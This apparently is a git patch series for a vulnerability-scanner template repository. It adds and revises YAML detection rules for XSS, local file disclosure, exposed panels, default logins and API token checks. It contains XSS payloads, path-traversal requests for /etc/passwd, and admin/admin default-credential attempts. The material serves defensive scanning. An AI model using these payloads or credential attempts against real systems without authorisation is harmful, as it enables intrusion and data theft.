"{{BaseURL}}/?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E" redirects: true max-redirects: 1 @@ -35,6 +37,29 @@ requests: - "'>\"" - "'>\"" - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" part: body condition: or From 6bb885956ef4cc06827d939fedd2d8c6eac75278 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sun, 31 Oct 2021 06:44:13 +0900 Subject: [PATCH 3317/4083] Create wp-theme-diarise-lfi.yaml --- wp-theme-diarise-lfi.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 wp-theme-diarise-lfi.yaml diff --git a/wp-theme-diarise-lfi.yaml b/wp-theme-diarise-lfi.yaml new file mode 100644 index 0000000000..eba06b5237 --- /dev/null +++ b/wp-theme-diarise-lfi.yaml @@ -0,0 +1,26 @@ +id: wp-theme-diarise-lfi +info: + name: WordPress Diarise 1.5.9 Local File Disclosure + author: 0x_Akoko + severity: high + description: WordPress Diarise theme version 1.5.9 suffers from a local file disclosure vulnerability. + reference: + - https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html + - https://cxsecurity.com/issue/WLB-2019050123 + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From c81b38ca4060cdab30605095e618346a81a3ec02 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sun, 31 Oct 2021 06:48:32 +0900 Subject: [PATCH 3318/4083] Create CVE-2019-16123.yaml --- CVE-2019-16123.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 CVE-2019-16123.yaml diff --git a/CVE-2019-16123.yaml b/CVE-2019-16123.yaml new file mode 100644 index 0000000000..cba06ac6a3 --- /dev/null +++ b/CVE-2019-16123.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-16123 +info: + name: PilusCart <= 1.4.1 - Local File Disclosure + author: 0x_Akoko + severity: high + description: PilusCart versions 1.4.1 and below suffers from a file disclosure vulnerability. + reference: + - https://packetstormsecurity.com/files/154250/PilusCart-1.4.1-Local-File-Disclosure.html + - https://www.cvedetails.com/cve/CVE-2019-16123 + tags: cve,cve2019,piluscart,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-16123 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 00df1b70aba4422d8be186610cabaca894b8b291 Mon Sep 17 00:00:00 2001 From: mahhari <93463214+mahhari@users.noreply.github.com> Date: Sun, 31 Oct 2021 09:02:17 +0300 Subject: [PATCH 3319/4083] Add files via upload --- exposed-panels/forcepoint.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposed-panels/forcepoint.yaml diff --git a/exposed-panels/forcepoint.yaml b/exposed-panels/forcepoint.yaml new file mode 100644 index 0000000000..b014686de4 --- /dev/null +++ b/exposed-panels/forcepoint.yaml @@ -0,0 +1,28 @@ +id: Forcepoint-pem-login-panel +info: + name: Forcepoint Login panel + author: husain + severity: info + reference: https://www.forcepoint.com/product/email-security + tags: forcepoint,panel,email + +requests: + - method: GET + path: + - '{{BaseURL}}/pem/login/pages/login.jsf' + + matchers-condition: and + matchers: + + - type: word + words: + - "Forcepoint Email Security" + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'Version&[a-zA-Z][a-zA-Z][a-zA-Z][a-zA-Z];[0-9]+\.[0-9]' \ No newline at end of file From 8e27d69da44326aee8d7ce344d2acacc83878efa Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 31 Oct 2021 16:24:36 +0530 Subject: [PATCH 3320/4083] misc update --- vulnerabilities/generic/top-xss-params.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/vulnerabilities/generic/top-xss-params.yaml b/vulnerabilities/generic/top-xss-params.yaml index 8c12c7622e..f6cc199b5c 100644 --- a/vulnerabilities/generic/top-xss-params.yaml +++ b/vulnerabilities/generic/top-xss-params.yaml @@ -21,6 +21,8 @@ requests: matchers-condition: and matchers: - type: word + part: body + condition: or words: - "'>\"" - "'>\"" @@ -60,21 +62,19 @@ requests: - "'>\"" - "'>\"" - "'>\"" - part: body - condition: or - type: word + part: header words: - "text/html" - part: header - type: word + part: body + condition: or + negative: true words: - "Access Denied" - "You don't have permission to access" - part: body - condition: and - negative: true - type: status status: From fe6dbc8b4dc326b74158a198bc9c5884c44593ac Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 31 Oct 2021 16:56:16 +0530 Subject: [PATCH 3321/4083] misc update --- cves/2021/CVE-2021-31682.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-31682.yaml b/cves/2021/CVE-2021-31682.yaml index b17547ac27..cde1a07b90 100644 --- a/cves/2021/CVE-2021-31682.yaml +++ b/cves/2021/CVE-2021-31682.yaml @@ -20,7 +20,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/index.jsp?operatorlocale=en/%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%20' + - '{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' matchers-condition: and matchers: @@ -29,11 +29,13 @@ requests: - 200 - type: word - words: - - ">" part: body + condition: and + words: + - '">' + - 'common/lvl5' - type: word + part: header words: - "text/html" - part: header From d277d83c8ee2cda9fdebe42a55153155fca43724 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 31 Oct 2021 15:58:17 +0200 Subject: [PATCH 3322/4083] Add description --- vulnerabilities/wordpress/wp-javospot-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/wp-javospot-lfi.yaml b/vulnerabilities/wordpress/wp-javospot-lfi.yaml index 2cd2daec41..747c17bdeb 100644 --- a/vulnerabilities/wordpress/wp-javospot-lfi.yaml +++ b/vulnerabilities/wordpress/wp-javospot-lfi.yaml @@ -4,6 +4,7 @@ info: name: Javo Spot Premium Theme - Unauthenticated Directory Traversal author: 0x_Akoko severity: high + description: A vulnerability in Javo Spot Premium Theme allows remote unauthenticated attackers access to locally stored file and return their content. reference: - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/ - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab From 4381a462e2fe414b55514893ddaf6130a7f30977 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 31 Oct 2021 16:00:56 +0200 Subject: [PATCH 3323/4083] Add description --- vulnerabilities/thinkphp/thinkphp-501-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/thinkphp/thinkphp-501-rce.yaml b/vulnerabilities/thinkphp/thinkphp-501-rce.yaml index a9a21e4fd7..7184e4218d 100644 --- a/vulnerabilities/thinkphp/thinkphp-501-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-501-rce.yaml @@ -4,6 +4,7 @@ info: name: ThinkPHP 5.0.1 RCE author: lark-lab severity: critical + description: A vulnerability in ThinkPHP allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 's' parameter. tags: thinkphp,rce requests: From 42cdba56921873323cddcbb9e97476521f2d20ab Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 31 Oct 2021 21:10:48 +0530 Subject: [PATCH 3324/4083] moving file around + matcher update --- .../bigip-detection.yaml | 18 ++++++++++++------ 1 file changed, 12 insertions(+), 6 deletions(-) rename miscellaneous/unencrypted-bigip-ltm-cookie.yaml => technologies/bigip-detection.yaml (53%) diff --git a/miscellaneous/unencrypted-bigip-ltm-cookie.yaml b/technologies/bigip-detection.yaml similarity index 53% rename from miscellaneous/unencrypted-bigip-ltm-cookie.yaml rename to technologies/bigip-detection.yaml index 91aa49ff3a..4876d9d231 100644 --- a/miscellaneous/unencrypted-bigip-ltm-cookie.yaml +++ b/technologies/bigip-detection.yaml @@ -1,13 +1,13 @@ -id: unencrypted-bigip-ltm-cookie +id: bigip-detection info: - name: F5 BIGIP Unencrypted Cookie + name: BIGIP Cookie Detection author: PR3R00T severity: info reference: - https://www.intelisecure.com/how-to-decode-big-ip-f5-persistence-cookie-values - https://support.f5.com/csp/article/K23254150 - tags: misc + tags: bigip,tech requests: - method: GET @@ -16,8 +16,14 @@ requests: redirects: true matchers: + - type: word + part: header + words: + - 'BIGipServer~' + + extractors: - type: regex + part: header + group: 1 regex: - - '(BIGipServer[a-z\_\.\-\~0-9A-Z]*)=([0-9a-zA-Z\.]*;)' - - '=[0-9]*\.[0-9]{3,5}\.[0-9]{4};' - part: header \ No newline at end of file + - '(BIGipServer[a-z\_\.\-\~0-9A-Z]*)=([!a-z0-9A-Z/.=]+)' \ No newline at end of file From 68646016b18396791d8ea678b464d03bc7f60ca4 Mon Sep 17 00:00:00 2001 From: alifathi-h1 Date: Mon, 1 Nov 2021 13:38:54 +0800 Subject: [PATCH 3325/4083] SeedDMS Default Login --- .../seeddms/seeddms-default-login.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 default-logins/seeddms/seeddms-default-login.yaml diff --git a/default-logins/seeddms/seeddms-default-login.yaml b/default-logins/seeddms/seeddms-default-login.yaml new file mode 100644 index 0000000000..fe6396a2c5 --- /dev/null +++ b/default-logins/seeddms/seeddms-default-login.yaml @@ -0,0 +1,37 @@ +id: seeddms-default-login + +info: + name: SeedDMS Default Credential + author: alifathi-h1 + severity: high + reference: https://www.redhat.com/sysadmin/install-seeddms + tags: default-login,SeedDMS + +requests: + - raw: + - | + POST /op/op.Login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + login={{username}}&pwd={{password}}&lang= + + payloads: + username: + - admin + password: + - admin + + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - 'Location: /out/out.ViewFolder.php' + condition: and + part: header + + - type: status + status: + - 302 + From 7662b1734293c1e5a949b2c6c4578d432c7fe855 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 1 Nov 2021 13:26:01 +0530 Subject: [PATCH 3326/4083] misc update --- default-logins/seeddms/seeddms-default-login.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/default-logins/seeddms/seeddms-default-login.yaml b/default-logins/seeddms/seeddms-default-login.yaml index fe6396a2c5..695086cbe2 100644 --- a/default-logins/seeddms/seeddms-default-login.yaml +++ b/default-logins/seeddms/seeddms-default-login.yaml @@ -2,10 +2,10 @@ id: seeddms-default-login info: name: SeedDMS Default Credential - author: alifathi-h1 + author: alifathi-h1 severity: high reference: https://www.redhat.com/sysadmin/install-seeddms - tags: default-login,SeedDMS + tags: default-login,seeddms requests: - raw: @@ -26,12 +26,10 @@ requests: matchers-condition: and matchers: - type: word + part: header words: - 'Location: /out/out.ViewFolder.php' - condition: and - part: header - type: status status: - - 302 - + - 302 \ No newline at end of file From c1f0fd02a4c3f2466763c7e7ff8b46fc4aafb465 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 1 Nov 2021 13:29:59 +0530 Subject: [PATCH 3327/4083] misc update --- exposed-panels/forcepoint.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/exposed-panels/forcepoint.yaml b/exposed-panels/forcepoint.yaml index b014686de4..f8fcfb33d1 100644 --- a/exposed-panels/forcepoint.yaml +++ b/exposed-panels/forcepoint.yaml @@ -1,10 +1,11 @@ -id: Forcepoint-pem-login-panel +id: forcepoint-login-panel + info: name: Forcepoint Login panel author: husain severity: info reference: https://www.forcepoint.com/product/email-security - tags: forcepoint,panel,email + tags: forcepoint,panel requests: - method: GET @@ -17,6 +18,7 @@ requests: - type: word words: - "Forcepoint Email Security" + - type: status status: - 200 From 95b6237e378adbdf9d0755ebee6fa128598dd69b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 Nov 2021 14:28:28 +0530 Subject: [PATCH 3328/4083] Update and rename CVE-2019-16123.yaml to cves/2019/CVE-2019-16123.yaml --- CVE-2019-16123.yaml => cves/2019/CVE-2019-16123.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename CVE-2019-16123.yaml => cves/2019/CVE-2019-16123.yaml (100%) diff --git a/CVE-2019-16123.yaml b/cves/2019/CVE-2019-16123.yaml similarity index 100% rename from CVE-2019-16123.yaml rename to cves/2019/CVE-2019-16123.yaml index cba06ac6a3..5868d97896 100644 --- a/CVE-2019-16123.yaml +++ b/cves/2019/CVE-2019-16123.yaml @@ -7,12 +7,12 @@ info: reference: - https://packetstormsecurity.com/files/154250/PilusCart-1.4.1-Local-File-Disclosure.html - https://www.cvedetails.com/cve/CVE-2019-16123 - tags: cve,cve2019,piluscart,lfi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-16123 cwe-id: CWE-22 + tags: cve,cve2019,piluscart,lfi requests: - method: GET From 756ed2c4434d6edddae8890e8d63880ed20e5979 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 Nov 2021 14:37:16 +0530 Subject: [PATCH 3329/4083] Update and rename wp-theme-diarise-lfi.yaml to vulnerabilities/wordpress/diarise-theme-lfi.yaml --- .../wordpress/diarise-theme-lfi.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename wp-theme-diarise-lfi.yaml => vulnerabilities/wordpress/diarise-theme-lfi.yaml (90%) diff --git a/wp-theme-diarise-lfi.yaml b/vulnerabilities/wordpress/diarise-theme-lfi.yaml similarity index 90% rename from wp-theme-diarise-lfi.yaml rename to vulnerabilities/wordpress/diarise-theme-lfi.yaml index eba06b5237..ac34aa0c88 100644 --- a/wp-theme-diarise-lfi.yaml +++ b/vulnerabilities/wordpress/diarise-theme-lfi.yaml @@ -1,4 +1,4 @@ -id: wp-theme-diarise-lfi +id: diarise-theme-lfi info: name: WordPress Diarise 1.5.9 Local File Disclosure author: 0x_Akoko @@ -7,7 +7,7 @@ info: reference: - https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html - https://cxsecurity.com/issue/WLB-2019050123 - tags: cve,cve2015,wordpress,wp-plugin,lfi + tags: wordpress,wp-theme,lfi requests: - method: GET From ec2907e6b022518611e625bfa8e4ab68654d4890 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 Nov 2021 14:54:51 +0530 Subject: [PATCH 3330/4083] Update wildcard-postmessage.yaml --- misconfiguration/wildcard-postmessage.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/wildcard-postmessage.yaml b/misconfiguration/wildcard-postmessage.yaml index 124d43b8f9..381ada1c40 100644 --- a/misconfiguration/wildcard-postmessage.yaml +++ b/misconfiguration/wildcard-postmessage.yaml @@ -4,8 +4,8 @@ info: name: Wildcard postMessage detection author: pdteam severity: info - tags: xss reference: https://jlajara.gitlab.io/web/2020/06/12/Dom_XSS_PostMessage.html + tags: xss requests: - method: GET From 388f60b6c8a6fddd2b6d602a54c47e0fc9343e00 Mon Sep 17 00:00:00 2001 From: Gal Nagli <35578316+NagliNagli@users.noreply.github.com> Date: Mon, 1 Nov 2021 11:50:57 +0200 Subject: [PATCH 3331/4083] Update cacti-detect.yaml --- technologies/cacti-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/cacti-detect.yaml b/technologies/cacti-detect.yaml index 9d1d018f12..10d928122a 100644 --- a/technologies/cacti-detect.yaml +++ b/technologies/cacti-detect.yaml @@ -33,4 +33,4 @@ requests: - type: kval part: header kval: - - Set-Cookie + - Set_Cookie From ff5b68a343c01e99f29226527327450cdb072694 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 Nov 2021 15:30:54 +0530 Subject: [PATCH 3332/4083] Update wordpress-rdf-user-enum.yaml --- .../wordpress/wordpress-rdf-user-enum.yaml | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml b/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml index 25e847f6ea..3cdf7b479b 100644 --- a/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml +++ b/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml @@ -15,6 +15,18 @@ requests: matchers-condition: and matchers: + - type: word + part: header + words: + - "application/rdf+xml" + + - type: word + part: body + words: + - "" + condition: and + - type: status status: - 200 @@ -22,5 +34,6 @@ requests: extractors: - type: regex part: body + group: 1 regex: - - '' + - '<\/dc:creator>' From 0def30db7d5e7933d4e00f035d5c708db15a81b8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 Nov 2021 15:32:48 +0530 Subject: [PATCH 3333/4083] Update cacti-detect.yaml --- technologies/cacti-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/cacti-detect.yaml b/technologies/cacti-detect.yaml index 9d1d018f12..10d928122a 100644 --- a/technologies/cacti-detect.yaml +++ b/technologies/cacti-detect.yaml @@ -33,4 +33,4 @@ requests: - type: kval part: header kval: - - Set-Cookie + - Set_Cookie From a862dc3a6f67cbdde482de4646b37086ff7a5565 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 Nov 2021 15:33:06 +0530 Subject: [PATCH 3334/4083] Update wordpress-rdf-user-enum.yaml --- vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml b/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml index 3cdf7b479b..79301f7ca4 100644 --- a/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml +++ b/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml @@ -26,7 +26,7 @@ requests: - "" condition: and - + - type: status status: - 200 From 7b20a25fc69bc27fcb2839870678f8b9118aefcd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 Nov 2021 15:37:58 +0530 Subject: [PATCH 3335/4083] Update and rename wordpress-rdf-user-enum.yaml to rdf-user-enumeration.yaml --- ...rdpress-rdf-user-enum.yaml => rdf-user-enumeration.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename vulnerabilities/wordpress/{wordpress-rdf-user-enum.yaml => rdf-user-enumeration.yaml} (87%) diff --git a/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml b/vulnerabilities/wordpress/rdf-user-enumeration.yaml similarity index 87% rename from vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml rename to vulnerabilities/wordpress/rdf-user-enumeration.yaml index 79301f7ca4..8f6fe220a6 100644 --- a/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml +++ b/vulnerabilities/wordpress/rdf-user-enumeration.yaml @@ -1,9 +1,9 @@ -id: Wordpress-RDF-User-Enum +id: rdf-user-enumeration + info: - name: Wordpress-RDF-User-Enumeration + name: Wordpress RDF User Enumeration author: r3dg33k severity: info - reference: N/A tags: wordpress requests: From 48aeff21e85217f4d55f7a7bbb2e938c5c2f2795 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 Nov 2021 15:39:15 +0530 Subject: [PATCH 3336/4083] Revert "Update cacti-detect.yaml" This reverts commit 0def30db7d5e7933d4e00f035d5c708db15a81b8. --- technologies/cacti-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/cacti-detect.yaml b/technologies/cacti-detect.yaml index 10d928122a..9d1d018f12 100644 --- a/technologies/cacti-detect.yaml +++ b/technologies/cacti-detect.yaml @@ -33,4 +33,4 @@ requests: - type: kval part: header kval: - - Set_Cookie + - Set-Cookie From 72ce3989c019fc203fb73e49ec95d12d9a01b5fc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 Nov 2021 15:47:51 +0530 Subject: [PATCH 3337/4083] Update ms-active-directory-certificate-services-detect.yaml --- .../ms-active-directory-certificate-services-detect.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/exposed-panels/ms-active-directory-certificate-services-detect.yaml b/exposed-panels/ms-active-directory-certificate-services-detect.yaml index d64fbbf1f9..972a8200a2 100644 --- a/exposed-panels/ms-active-directory-certificate-services-detect.yaml +++ b/exposed-panels/ms-active-directory-certificate-services-detect.yaml @@ -11,6 +11,9 @@ requests: path: - "{{BaseURL}}" +redirects: true +max-redirects: 2 + matchers-condition: and matchers: - type: status @@ -28,4 +31,4 @@ requests: - "/CertSrv/" - "/CertSrv/Default.asp" part: header - condition: or \ No newline at end of file + condition: or From 700904c1ecd395cc98a3d0d137aeb18c64c20c76 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 1 Nov 2021 18:25:34 +0700 Subject: [PATCH 3338/4083] Create api-iconfinder.yaml --- token-spray/api-iconfinder.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 token-spray/api-iconfinder.yaml diff --git a/token-spray/api-iconfinder.yaml b/token-spray/api-iconfinder.yaml new file mode 100644 index 0000000000..d3cb4a0a09 --- /dev/null +++ b/token-spray/api-iconfinder.yaml @@ -0,0 +1,25 @@ +id: api-iconfinder + +info: + name: IconFinder API Test + author: daffainfo + reference: + - https://developer.iconfinder.com/reference/overview-1 + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/IconFinder.md + severity: info + tags: token-spray,iconfinder + +self-contained: true +requests: + - raw: + - | + GET /v4/icons/search?query=arrow&count=10 HTTP/1.1 + Host: api.iconfinder.com + Accept: application/json + Authorization: Bearer {{token}} + + matchers: + - type: status + negative: true + status: + - 401 From 9235142d1a1895812fdf032b2b8f4d992d6f4a5f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 Nov 2021 17:14:42 +0530 Subject: [PATCH 3339/4083] Update api-iconfinder.yaml --- token-spray/api-iconfinder.yaml | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/token-spray/api-iconfinder.yaml b/token-spray/api-iconfinder.yaml index d3cb4a0a09..31069943c2 100644 --- a/token-spray/api-iconfinder.yaml +++ b/token-spray/api-iconfinder.yaml @@ -3,23 +3,26 @@ id: api-iconfinder info: name: IconFinder API Test author: daffainfo + severity: info reference: - https://developer.iconfinder.com/reference/overview-1 - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/IconFinder.md - severity: info tags: token-spray,iconfinder self-contained: true requests: - raw: - | - GET /v4/icons/search?query=arrow&count=10 HTTP/1.1 + GET https://api.iconfinder.com/v4/icons/search?query=arrow&count=10 HTTP/1.1 Host: api.iconfinder.com Accept: application/json Authorization: Bearer {{token}} - + matchers: - - type: status - negative: true - status: - - 401 + - type: word + part: body + words: + - '"icons":' + - '"is_icon_glyph":' + - '"download_url":' + condition: and From 6d2214d670c54eb5e5fa88ec82b73d83eecc68a4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 Nov 2021 17:52:18 +0530 Subject: [PATCH 3340/4083] matchers updated --- token-spray/api-adafruit-io.yaml | 5 +++-- .../{apigee-edge.yaml => api-apigee-edge.yaml} | 7 ++++--- token-spray/api-appveyor.yaml | 5 +++-- token-spray/{asana.yaml => api-asana.yaml} | 11 +++++++---- token-spray/api-binance.yaml | 8 ++++---- token-spray/{bingmaps.yaml => api-bingmaps.yaml} | 0 token-spray/{bitly.yaml => api-bitly.yaml} | 5 +++-- token-spray/{buildkite.yaml => api-buildkite.yaml} | 11 +++++++---- token-spray/{buttercms.yaml => api-buttercms.yaml} | 11 +++++++---- token-spray/{calendly.yaml => api-calendly.yaml} | 10 +++++++--- token-spray/{circleci.yaml => api-circleci.yaml} | 9 ++++++--- token-spray/api-cooperhewitt.yaml | 10 +++++++--- token-spray/{deviantart.yaml => api-deviantart.yaml} | 5 ++--- token-spray/api-europeana.yaml | 10 +++++++--- token-spray/api-leanix.yaml | 5 +++-- token-spray/api-strava.yaml | 5 +++-- token-spray/api-taiga.yaml | 5 +++-- token-spray/api-thecatapi.yaml | 10 ++++++---- token-spray/api-webex.yaml | 6 ++++-- 19 files changed, 86 insertions(+), 52 deletions(-) rename token-spray/{apigee-edge.yaml => api-apigee-edge.yaml} (87%) rename token-spray/{asana.yaml => api-asana.yaml} (71%) rename token-spray/{bingmaps.yaml => api-bingmaps.yaml} (100%) rename token-spray/{bitly.yaml => api-bitly.yaml} (83%) rename token-spray/{buildkite.yaml => api-buildkite.yaml} (70%) rename token-spray/{buttercms.yaml => api-buttercms.yaml} (69%) rename token-spray/{calendly.yaml => api-calendly.yaml} (71%) rename token-spray/{circleci.yaml => api-circleci.yaml} (71%) rename token-spray/{deviantart.yaml => api-deviantart.yaml} (88%) diff --git a/token-spray/api-adafruit-io.yaml b/token-spray/api-adafruit-io.yaml index c9eb638d7d..5fc0e8d40c 100644 --- a/token-spray/api-adafruit-io.yaml +++ b/token-spray/api-adafruit-io.yaml @@ -19,5 +19,6 @@ requests: - type: word part: body words: - - "error" - negative: true + - '"username":' + - '"id":' + condition: and \ No newline at end of file diff --git a/token-spray/apigee-edge.yaml b/token-spray/api-apigee-edge.yaml similarity index 87% rename from token-spray/apigee-edge.yaml rename to token-spray/api-apigee-edge.yaml index 52c95af31a..e724933ea0 100644 --- a/token-spray/apigee-edge.yaml +++ b/token-spray/api-apigee-edge.yaml @@ -3,8 +3,8 @@ id: api-apigee-edge info: name: Apigee Edge API Test author: dwisiswant0 - reference: https://apidocs.apigee.com/apis severity: info + reference: https://apidocs.apigee.com/apis tags: token-spray,apigee self-contained: true @@ -24,5 +24,6 @@ requests: - type: word part: body words: - - "fault" - negative: true + - '"uuid":' + - '"name":' + condition: and diff --git a/token-spray/api-appveyor.yaml b/token-spray/api-appveyor.yaml index e1b8ee023e..25bac0e370 100644 --- a/token-spray/api-appveyor.yaml +++ b/token-spray/api-appveyor.yaml @@ -20,5 +20,6 @@ requests: - type: word part: body words: - - "Authorization required" - negative: true + - '"roleId":' + - '"created":' + condition: and \ No newline at end of file diff --git a/token-spray/asana.yaml b/token-spray/api-asana.yaml similarity index 71% rename from token-spray/asana.yaml rename to token-spray/api-asana.yaml index 482dc7bdd9..9608f3c236 100644 --- a/token-spray/asana.yaml +++ b/token-spray/api-asana.yaml @@ -16,7 +16,10 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - negative: true - status: - - 401 + - type: word + part: body + words: + - 'data:' + - 'email' + - 'name' + condition: and diff --git a/token-spray/api-binance.yaml b/token-spray/api-binance.yaml index 064b6f6f1d..b2e24bbb78 100644 --- a/token-spray/api-binance.yaml +++ b/token-spray/api-binance.yaml @@ -19,7 +19,7 @@ requests: - type: word part: body words: - - "Invalid API-key" - - "key format invalid" - condition: or - negative: true + - '"id":' + - '"price":' + - '"quoteQty":' + condition: and \ No newline at end of file diff --git a/token-spray/bingmaps.yaml b/token-spray/api-bingmaps.yaml similarity index 100% rename from token-spray/bingmaps.yaml rename to token-spray/api-bingmaps.yaml diff --git a/token-spray/bitly.yaml b/token-spray/api-bitly.yaml similarity index 83% rename from token-spray/bitly.yaml rename to token-spray/api-bitly.yaml index 01c70c7974..0a4c307e15 100644 --- a/token-spray/bitly.yaml +++ b/token-spray/api-bitly.yaml @@ -16,6 +16,7 @@ requests: matchers: - type: word part: body - negative: true words: - - 'INVALID_ARG_ACCESS_TOKEN' + - '"long_url":' + - '"created_at":' + condition: and \ No newline at end of file diff --git a/token-spray/buildkite.yaml b/token-spray/api-buildkite.yaml similarity index 70% rename from token-spray/buildkite.yaml rename to token-spray/api-buildkite.yaml index 350b8edd1b..7855f0b53b 100644 --- a/token-spray/buildkite.yaml +++ b/token-spray/api-buildkite.yaml @@ -16,7 +16,10 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"id":' + - '"graphql_id":' + - '"email":' + condition: and \ No newline at end of file diff --git a/token-spray/buttercms.yaml b/token-spray/api-buttercms.yaml similarity index 69% rename from token-spray/buttercms.yaml rename to 